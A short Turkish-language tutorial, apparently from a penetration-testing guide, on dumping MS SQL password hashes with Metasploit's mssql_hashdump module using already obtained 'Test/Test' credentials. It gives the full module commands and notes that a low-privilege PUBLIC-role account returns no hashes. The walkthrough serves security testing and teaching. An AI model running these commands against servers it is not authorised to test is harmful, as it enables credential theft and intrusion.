Kurum ağında 10.20.30.72 IP adresindeki MS SQL veritabanına ait erişim bilgileri, “Test/Test” olarak elde edilmiş olsun. Bu kullanıcının hakları ile, veritabanındaki kullanıcı hesaplarına ait parola özetlerini elde etmek için MSF mssql_hashdump modülü kullanılabilir. Bu amaçla, modül seçilir ve seçenekleri incelenir.
search mssql_hashdump
use auxiliary/scanner/mssql/mssql_hashdump
show options
Modüle IP adresi, erişim için gerekli kimlik bilgisi verilerek modül seçenekleri ayarlanabilir.
set RHOST 10.20.30.72
set USERNAME Test
set PASSWORD Test
show options
Seçenekler ayarlandırıldıktan sonra modül çalıştırılabilir. Modül çalıştırıldığında veritabanındaki kullanıcı hesaplarının parola özetleri listelenir.
run
Not: Erişim bilgileri elde edilen ve MSF mssql_hashdump auxiliary modülüne parametre olarak verilen kullanıcı hesabı sunucu üzerinde yeterli yetkilere sahip değilse, modül çalıştırıldığında herhangi bir hesaba ait kimlik bilgisi elde edilemez. Örneğin PUBLIC sunucu rolündeki “sql_hesabi/sql_hesabi” adlı veritabanı kullanıcı hesabı ile modül çalıştırıldığında herhangi bir parola özetinin elde edilemediği görülmektedir.